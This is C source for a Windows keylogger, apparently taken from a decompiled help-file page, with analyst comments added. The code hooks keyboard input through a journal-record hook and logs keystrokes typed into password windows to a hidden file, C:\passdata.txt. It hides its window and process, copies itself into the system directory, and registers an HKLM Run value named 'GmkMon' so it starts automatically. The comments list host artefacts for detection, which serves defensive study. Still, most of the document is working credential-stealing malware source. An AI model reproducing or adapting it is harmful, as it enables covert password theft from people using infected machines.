/*
 * Analyst annotations; the code is unchanged apart from line breaks.
 *
 * Win32 program that records key-down events through a journal-record hook,
 * appends them to a hidden file, copies its own image under the system
 * directory and registers that copy in an HKLM Run value.
 * hHook, GetKey, IsPassWindow, HideProc, SERVICE_PROC and RUN are used below
 * but are declared outside this excerpt (the page footer suggests an earlier
 * page of the same listing).
 *
 * Host artefacts visible in this code, useful for triage and detection:
 *   - file    C:\passdata.txt, opened with FILE_ATTRIBUTE_HIDDEN
 *   - mutex   "GMKRunOnlyOne"
 *   - value   "GmkMon" under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 *   - window  class "jiajia", title "jia jia", shown with SW_HIDE
 *   - API     SetWindowsHookEx(WH_JOURNALRECORD, ...)
 */

/*
 * Appends one byte derived from a key code to C:\passdata.txt.
 *
 * nKey: key code; only its low byte is handed to GetKey().
 * GetKey() is not defined in this excerpt -- presumably it maps the key code
 * to a character; confirm against its definition.
 */
void WINAPI WritePassFile(int nKey)
{
    HANDLE hFile;
    DWORD dwBytesWrite=1;
    TCHAR lpStr,szTemp[MAX_PATH];

    /* OPEN_ALWAYS: opens the log if it exists, creates it otherwise. */
    hFile=CreateFile("C:\\passdata.txt",
        GENERIC_READ|GENERIC_WRITE,
        FILE_SHARE_WRITE,
        NULL,
        OPEN_ALWAYS,
        FILE_ATTRIBUTE_HIDDEN,
        NULL
        );
    /* Move to end of file so every call appends. */
    SetFilePointer(hFile,0,NULL,FILE_END);
    lpStr=GetKey(LOBYTE(nKey));
    /* Exactly one byte is written per logged key. */
    WriteFile(hFile,&lpStr,1,&dwBytesWrite,0);
    CloseHandle(hFile);
}

/*
 * Installs JournalRecordProc as a WH_JOURNALRECORD hook, once: nothing is
 * done when hHook is already non-NULL.
 *
 * hInstance: module handle passed through to SetWindowsHookEx.
 *
 * Defender note: a journal-record hook receives input messages for the whole
 * desktop, so this call from a process whose only window is hidden is a
 * behaviour worth alerting on. Microsoft documents journaling hooks as
 * unsupported starting with Windows 11.
 */
void WINAPI InstallHook(HINSTANCE hInstance)
{
    if(hHook==NULL)
        hHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalRecordProc,hInstance,0);
}

/* Removes the hook if one was installed. hHook is not reset afterwards. */
void WINAPI UninstallHook()
{
    if(hHook!=NULL)
        UnhookWindowsHookEx(hHook);
}

/*
 * Hook callback registered by InstallHook().
 *
 * lParam is treated as a pointer to an EVENTMSG. For WM_KEYDOWN the low byte
 * of paramL is logged through WritePassFile(), but only while IsPassWindow()
 * returns non-zero. IsPassWindow() is not defined in this excerpt --
 * presumably it tests whether a password field has focus; confirm.
 * Every event is forwarded with CallNextHookEx().
 */
LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam)
{
    EVENTMSG *pMess=(EVENTMSG *)lParam;
    POINT pt;

    switch(pMess->message)
    {
    case WM_KEYDOWN:
        if(IsPassWindow())
            WritePassFile(LOBYTE(pMess->paramL));
        break;
    case WM_LBUTTONDBLCLK:
        /* Cursor position is read into pt and not used afterwards. */
        GetCursorPos(&pt);
        break;
    }
    return CallNextHookEx(hHook,nCode,wParam,lParam);
}

/*
 * Program entry point. In order: single-instance check, hidden window,
 * hook installation, self-copy, Run-key registration, message loop.
 * Returns msg.wParam from the message that ended the loop.
 */
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
                    PSTR szCmdLine, int iCmdShow)
{
    /* Named mutex: a second instance exits with code 1. */
    HANDLE hMutex=CreateMutex(NULL,FALSE,"GMKRunOnlyOne");
    if(hMutex==NULL||ERROR_ALREADY_EXISTS==GetLastError()){
        ExitProcess(1);
    }

    static char szAppName[] = "jiajia" ;
    HWND hwnd ;
    MSG msg ;
    WNDCLASSEX wndclass ;
    HKEY hKey=0;
    DWORD disp=0;
    LONG lResult;
    TCHAR szKey[MAX_PATH];
    TCHAR szSysDir[MAX_PATH+25];
    TCHAR szFileName[MAX_PATH];

    wndclass.cbSize = sizeof (wndclass) ;
    wndclass.style = CS_HREDRAW | CS_VREDRAW ;
    wndclass.lpfnWndProc = WndProc ;
    wndclass.cbClsExtra = 0 ;
    wndclass.cbWndExtra = 0 ;
    wndclass.hInstance = hInstance ;
    wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION) ;
    wndclass.hCursor = LoadCursor (NULL, IDC_ARROW) ;
    wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH) ;
    wndclass.lpszMenuName = NULL ;
    wndclass.lpszClassName = szAppName ;
    wndclass.hIconSm = LoadIcon (NULL, IDI_APPLICATION) ;
    RegisterClassEx(&wndclass);

    hwnd=CreateWindow(
        szAppName,
        "jia jia",
        WS_OVERLAPPEDWINDOW,
        CW_USEDEFAULT,
        CW_USEDEFAULT,
        CW_USEDEFAULT,
        CW_USEDEFAULT,
        NULL,
        NULL,
        hInstance,
        NULL
        );
    /* The window exists only to own a message loop; it is never displayed. */
    ShowWindow(hwnd,SW_HIDE);
    UpdateWindow(hwnd);

    /*
     * HideProc and SERVICE_PROC are not defined in this excerpt; the names
     * suggest the process is hidden from the task list -- confirm.
     */
    HideProc(SERVICE_PROC);
    InstallHook(hInstance);

    /*
     * Copy destination = system directory + RUN (macro not shown here).
     * The running image is copied there; FALSE allows overwriting an
     * existing file.
     */
    GetSystemDirectory(szSysDir,MAX_PATH);
    lstrcat(szSysDir,RUN);
    GetModuleFileName(NULL,szFileName,MAX_PATH);
    CopyFile(szFileName,szSysDir,FALSE);

    /*
     * Autostart: value "GmkMon" under the HKLM Run key is set to the copied
     * path. This key is a standard autostart location to monitor for new or
     * changed values.
     */
    lstrcpy(szKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
    lResult=RegCreateKeyEx(
        HKEY_LOCAL_MACHINE,
        szKey,
        0,
        NULL,
        REG_OPTION_VOLATILE,
        KEY_ALL_ACCESS,
        NULL,
        &hKey,
        &disp
        );
    if(lResult==ERROR_SUCCESS)
    {
        lResult=RegSetValueEx(hKey,"GmkMon",0,REG_SZ,szSysDir,lstrlen(szSysDir));
        RegCloseKey(hKey);
    }

    /* Standard message pump; runs until WM_QUIT. */
    while (GetMessage (&msg, NULL, 0, 0))
    {
        TranslateMessage (&msg) ;
        DispatchMessage (&msg) ;
    }
    return msg.wParam ;
}

/*
 * Window procedure for the hidden window.
 * WM_PAINT is swallowed; WM_DESTROY removes the hook and ends the message
 * loop; every other message goes to DefWindowProc().
 */
LRESULT CALLBACK WndProc (HWND hwnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
{
    switch (iMsg)
    {
    case WM_PAINT:
        return 0 ;
    case WM_DESTROY:
        UninstallHook();
        PostQuitMessage (0) ;
        return 0 ;
    }
    return DefWindowProc(hwnd,iMsg,wParam,lParam);
}
This file is decompiled by an unregistered version of ChmDecompiler. Regsitered version does not show this message. You can download ChmDecompiler at : http://www.zipghost.com/ 上一页 [1] [2] |